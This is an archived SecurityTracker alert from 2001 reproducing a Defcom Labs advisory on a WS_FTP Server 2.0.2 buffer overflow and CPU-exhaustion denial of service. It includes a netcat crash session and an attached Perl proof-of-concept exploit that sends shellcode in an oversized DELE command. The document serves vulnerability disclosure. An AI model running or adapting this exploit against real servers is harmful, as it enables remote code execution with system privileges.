Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
Ipswitch's WS_FTP Server Will Execute Remotely-Supplied Arbitrary Code, Typically With System Privileges
|
|
SecurityTracker Alert ID: 1002090 |
|
SecurityTracker URL: http://securitytracker.com/id/1002090
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jul 27 2001
|
Impact:
Denial of service via network, Execution of arbitrary code via network, Root access via network
|
Fix Available: Yes Vendor Confirmed: Yes Exploit Included: Yes
|
Version(s): 2.0.2; possibly earlier versions
|
Description:
Defcom Labs reported a vulnerability in the WS_FTP server that allows remote users to execute arbitrary code on the server, typically with System privileges. It may also allow remote users to crash the service.
The buffer overflow can reportedly be triggered by a valid remote user (including anonymous users) using the following commands: DELE, MDTM, MLST, MKD, RMD, RNFR, RNTO, SIZE, STAT, XMKD, and XRMD.
A remote user with a valid FTP account (including anonymous) can send a command with an argument longer than 478 (474 bytes + new return address) bytes, causing a buffer overflow that will overwrite the EIP address.
It is also reported that a remote user with a valid FTP account (including anonymous access) can send several NULL(0x0) characters to cause the WS_FTP Server to consume 100% of CPU resources.
A demonstration exploit script is included in the Source Message.
|
Impact:
A remote user with FTP account access (including anonymous access) can execute arbitrary code on the server, typically with System level privileges, giving the remote user System level access to the operating system. The remote user may also be able to cause the service to consume all available CPU resources.
|
Solution:
The vendor has released a patch. See the Vendor URL to obtain the patch.
|
Vendor URL: www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html (Links to External Site)
|
Cause:
Boundary error
|
Underlying OS:
|
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 26 Jul 2001 13:25:13 +0100
Subject: def-2001-28 - WS_FTP server 2.0.2 Buffer Overflow and possible DOS
|
--------------C4C0A63EEF25A05BF6224EB3
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
======================================================================
Defcom Labs Advisory def-2001-28
WS_FTP server 2.0.2 Buffer Overflow and possible DOS
Author: Andreas Junestam <andreas@defcom.com>
Co-Author: Janne Sarendal <janne@defcom.com>
Release Date: 2001-07-26
======================================================================
------------------------=[Brief Description]=-------------------------
WS_FTP server 2.0.2 contains a buffer overflow which affects the
following commands:
* DELE
* MDTM
* MLST
* MKD
* RMD
* RNFR
* RNTO
* SIZE
* STAT
* XMKD
* XRMD
This buffer overflow gives an attacker the ability to run code on
the target with SYSTEM RIGHTS, due to the fact that the server runs
as a service by default. OBS: This is only valid when logged in as
an anonymous user, not an ordinary one.
The server also contains a easy-to-trigger DOS.
------------------------=[Affected Systems]=--------------------------
- WS_FTP server 2.0.2, havn't tested other versions
----------------------=[Detailed Description]=------------------------
* Command Buffer Overrun
All the above mentioned commands seems to be using the same parsing
code which suffers from a buffer overflow. By sending a command with
an argument greater than 478 (474 bytes + new return address) bytes,
a buffer will overflow and the EIP will be overwritten. A
proof-of-concept exploit is attached to the advisory, which works
against WS_FTP server 2.0.2 running on WIN2K (Professional and
Server, any SP).
C:\tools\web>nc -nvv 127.0.0.1 21
(UNKNOWN) [127.0.0.1] 21 (?) open
220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
220-Tue Jun 19 14:00:21 2001
220-30 days remaining on evaluation.
220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
user ftp
331 Password required
pass ftp
230 user logged in
DELE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Access violation - code c0000005 (first chance)
eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278
edi=77fca3e0
eip=41414141 esp=0104df88 ebp=41414141 iopl=0 nv up ei pl zr
na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00010246
* Possible DOS
By sending a couple of NULL(0x0) characters, the WS_FTP Server
will spike at 100% CPU.
---------------------------=[Workaround]=-----------------------------
Download the new version from:
http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html
-----------------------------=[Exploit]=------------------------------
See attached file, ws_ftp.pl
-------------------------=[Vendor Response]=--------------------------
This issue was brought to the vendors attention on the 18th of
June, 2001. Patch is released.
======================================================================
This release was brought to you by Defcom Labs
labs@defcom.com www.defcom.com
======================================================================
--------------C4C0A63EEF25A05BF6224EB3
Content-Type: application/x-perl;
name="ws_ftp.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="ws_ftp.pl"
#!/usr/local/bin/perl
#########################################################################
#
# WS_FTP Server 2.0.2 DELE proof-of-concept exploit
# By andreas@defcom.com and janne@defcom.com (C)2001
#
#########################################################################
$login="ftp"; #username
$pass="ftp"; #password
#########################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
print "WS_FTP server 2.0.2 DELE proof-of-concept exploit\n";
print "It creates a file named defcom.iyd in the c-root\n";
print "(C)2001 andreas\@defcom.com\n";
print "Usage: $0 <host>\n";
print "Example: $0 127.0.0.1\n";
exit;
}
use Socket;
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "21";
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
sleep(1);
$msg = "user $login\n";
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$msg = "pass $pass\n";
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$sploit = "\x8b\xd8\x8b\xf8\x83\xc0\x18\x33\xc9\x66\xb9\x42\x81\x66\x81\xf1\x80\x80\x80\x30\x95\x40\xe2\xfa\xde\x1e\x76";
$sploit = $sploit . "\x1e\x7e\x2e\x95\x6f\x95\x95\xc6\xfd\xd5\x95\x95\x95\x2b\x49\x81\xd0\x95\x6a\x83\x96\x56\x1e\x75\x1e\x7d\xa6\x55";
$sploit = $sploit . "\xc5\xfd\x15\x95\x95\x95\xff\x97\xc5\xc5\xfd\x95\x95\x95\x85\x14\x52\x59\x94\x95\x95\xc2\x2b\xb1\x80\xd0\x95";
$sploit = $sploit . "\x6a\x83\xc5\x2b\x6d\x81\xd0\x95\x6a\x83\xa6\x55\xc5\x2b\x85\x83\xd0\x95\x6a\x83";
$msg = "dele " . $sploit . "\xd4" x (460-length($sploit)) . "\xf6\xaf\xc9\xf1\xf0\xf3\xf6\xfa\xf8\xbb\xfc\xec\xf1\x95";
$msg = $msg . "\xab\xa3\x54\x77" . "\xd4" x 16 . "\x8b\xc4\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x71\xff\xe0\n";
print $msg;
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
exit;
--------------C4C0A63EEF25A05BF6224EB3--
|
|
Go to the Top of This SecurityTracker Archive Page
|
